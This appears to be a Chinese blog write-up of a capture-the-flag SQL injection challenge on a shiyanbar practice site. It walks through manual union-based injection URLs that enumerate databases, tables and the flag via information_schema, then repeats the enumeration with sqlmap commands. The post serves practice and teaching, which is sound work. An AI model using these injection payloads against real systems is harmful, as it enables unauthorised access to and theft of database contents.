21.這個看起來有點簡單

這題就是個sqi注入的:

    手工注入:

        我先是簡單嘗試,就發現了,可以執行sql語句

        http://ctf5.shiyanbar.com/8/index.php?id=2 group by 2 沒報錯

        http://ctf5.shiyanbar.com/8/index.php?id=2 gourp by 3 報錯

        說明我們有兩個字段可以提供給我們使用,比如說如下語句

        http://ctf5.shiyanbar.com/8/index.php?id=2 union select 1,2

        wKiom1mDFg3A5AYAAAA1SqeNsn0832.png-wh_50

        那麼就簡單了,直接查看所以數據庫名

        http://ctf5.shiyanbar.com/8/index.php?id=2 union select group_concat(schema_name,"~~"),2 from information_schema.schemata

        wKioL1mDFxPSRyRkAABCbF8cN5k317.png-wh_50

        得到三個數據庫,我們猜測第2個數據庫中(因爲該頁面的數據就在其中可以用database()查看)

        查看裏面所有的表

        http://ctf5.shiyanbar.com/8/index.php?id=2 union select group_concat(table_name,"~~"),2 from information_schema.tables where table_schema ='my_db'

        wKioL1mDGBfRf0MNAAAzlZUNPcI122.png-wh_50

        應該就是這個,查看字段名

        wKioL1mDGHCCMWQjAAAzZTsZXWE632.png-wh_50

        OK現在可以直接看flag了

        wKiom1mDGNCj7EhBAAArO0P3YnY542.png-wh_50

        直接複製進去就可以提交了



       SqlMap工具利用,這個就快當了:

        探測是否有注入:

        wKioL1mDG5LS0X4eAABZSfqQio8321.png-wh_50

        有注入漏洞:

        wKioL1mDG7_QXZwZAAATT0t6E8U590.png-wh_50

        爆破所有數據庫:

        -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dbs

        發現三個數據庫:

        wKioL1mDHDmjAhUnAAAqNXgczl0259.png-wh_50

        爆my_db庫中的表:

        -u "http://ctf5.shiyanbar.com/8/index.php?id=2" -D "my_db" --tables

        發現兩個表:

        wKioL1mDHNGjhDzFAAALnxlmVM4789.png-wh_50

        直接爆thiskey這個表中的字段:

        http://ctf5.shiyanbar.com/8/index.php?id=2  -u "http://ctf5.shiyanbar.com/8/index.php?id=2" -D "my_db" -T "thiskey" --column

        wKiom1mDHrSx_jFyAABTNDriPYo819.jpg-wh_50

        得到Key(我用的是最新sqlmap)

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章